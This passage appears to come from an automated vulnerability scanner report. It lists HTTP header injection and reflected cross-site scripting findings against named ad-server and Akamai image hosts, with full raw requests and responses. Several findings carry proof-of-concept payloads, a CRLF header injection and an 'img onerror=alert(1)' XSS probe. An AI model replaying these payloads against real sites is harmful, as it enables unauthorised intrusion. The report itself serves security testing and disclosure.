Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:07:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100253|17778^1315097086^1315098886|11684^1315098448^1315100253; path=/; expires=Sun, 04-Sep-11 01:37:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f925acac
221f811ccdb
,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


4.3. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload fa8dd%0d%0afea8607b62f was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=LCN&si=fa8dd%0d%0afea8607b62f&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:35 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:21:35 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:35 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:06:35 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100195|17778^1315097086^1315098886|11684^1315098364^1315100193|fa8dd
fea8607b62f
^1315098395^1315100195; path=/; expires=Sun, 04-Sep-11 01:36:35 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


5. Cross-site scripting (reflected)  previous  next
There are 105 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2fd86<img%20src%3da%20onerror%3dalert(1)>af4802e2c43 was submitted in the REST URL parameter 9. This input was echoed as 2fd86<img src=a onerror=alert(1)>af4802e2c43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b2fd86<img%20src%3da%20onerror%3dalert(1)>af4802e2c43?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:42 GMT
Connection: close

Unable to find /ProvideCommerce/P0026084b2fd86<img src=a onerror=alert(1)>af4802e2c43

5.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 49c07<img%20src%3da%20onerror%3dalert(1)>86ab35ef3ef was submitted in the REST URL parameter 9. This input was echoed as 49c07<img src=a onerror=alert(1)>86ab35ef3ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b49c07<img%20src%3da%20onerror%3dalert(1)>86ab35ef3ef?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:15 GMT
Connection: close

Unable to find /ProvideCommerce/P0054242b49c07<img src=a onerror=alert(1)>86ab35ef3ef

5.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 56b44<img%20src%3da%20onerror%3dalert(1)>5949f4937c0 was submitted in the REST URL parameter 9. This input was echoed as 56b44<img src=a onerror=alert(1)>5949f4937c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b56b44<img%20src%3da%20onerror%3dalert(1)>5949f4937c0?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:13 GMT
Connection: close

Unable to find /ProvideCommerce/P0057916b56b44<img src=a onerror=alert(1)>5949f4937c0

5.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 30b2f<img%20src%3da%20onerror%3dalert(1)>5d12361a7b4 was submitted in the REST URL parameter 9. This input was echoed as 30b2f<img src=a onerror=alert(1)>5d12361a7b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P007188130b2f<img%20src%3da%20onerror%3dalert(1)>5d12361a7b4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:13 GMT
Connection: close

Unable to find /ProvideCommerce/P007188130b2f<img src=a onerror=alert(1)>5d12361a7b4

5.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b573e<img%20src%3da%20onerror%3dalert(1)>554311b6c84 was submitted in the REST URL parameter 9. This input was echoed as b573e<img src=a onerror=alert(1)>554311b6c84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727bb573e<img%20src%3da%20onerror%3dalert(1)>554311b6c84?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:02 GMT
Connection: close

Unable to find /ProvideCommerce/P0073727bb573e<img src=a onerror=alert(1)>554311b6c84

5.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1047c<img%20src%3da%20onerror%3dalert(1)>2e316f78077 was submitted in the REST URL parameter 9. This input was echoed as 1047c<img src=a onerror=alert(1)>2e316f78077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b1047c<img%20src%3da%20onerror%3dalert(1)>2e316f78077?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:41 GMT
Connection: close

Unable to find /ProvideCommerce/P0090481b1047c<img src=a onerror=alert(1)>2e316f78077

5.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7c462<img%20src%3da%20onerror%3dalert(1)>76984cbffb3 was submitted in the REST URL parameter 9. This input was echoed as 7c462<img src=a onerror=alert(1)>76984cbffb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b7c462<img%20src%3da%20onerror%3dalert(1)>76984cbffb3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:19 GMT
Connection: close

Unable to find /ProvideCommerce/P0105447b7c462<img src=a onerror=alert(1)>76984cbffb3

5.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b1157<img%20src%3da%20onerror%3dalert(1)>920787cad49 was submitted in the REST URL parameter 9. This input was echoed as b1157<img src=a onerror=alert(1)>920787cad49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684bb1157<img%20src%3da%20onerror%3dalert(1)>920787cad49?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:58 GMT
Connection: close

Unable to find /ProvideCommerce/P0105684bb1157<img src=a onerror=alert(1)>920787cad49

5.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 966ec<img%20src%3da%20onerror%3dalert(1)>cb6928d315 was submitted in the REST URL parameter 9. This input was echoed as 966ec<img src=a onerror=alert(1)>cb6928d315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b966ec<img%20src%3da%20onerror%3dalert(1)>cb6928d315?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:16 GMT
Connection: close

Unable to find /ProvideCommerce/P0106998b966ec<img src=a onerror=alert(1)>cb6928d315

5.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8719d<img%20src%3da%20onerror%3dalert(1)>48d0d519a3c was submitted in the REST URL parameter 9. This input was echoed as 8719d<img src=a onerror=alert(1)>48d0d519a3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W18719d<img%20src%3da%20onerror%3dalert(1)>48d0d519a3c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:05 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000001016X_35172_W18719d<img src=a onerror=alert(1)>48d0d519a3c

5.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5ad2c<img%20src%3da%20onerror%3dalert(1)>a2783a548b0 was submitted in the REST URL parameter 9. This input was echoed as 5ad2c<img src=a onerror=alert(1)>a2783a548b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ5ad2c<img%20src%3da%20onerror%3dalert(1)>a2783a548b0?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:24 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_000000076432_66228_W1_SQ5ad2c<img src=a onerror=alert(1)>a2783a548b0

5.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 90233<img%20src%3da%20onerror%3dalert(1)>4af1509f708 was submitted in the REST URL parameter 9. This input was echoed as 90233<img src=a onerror=alert(1)>4af1509f708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ90233<img%20src%3da%20onerror%3dalert(1)>4af1509f708?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:17 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007G437_68702_W1_SQ90233<img src=a onerror=alert(1)>4af1509f708

5.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ

Issue detail

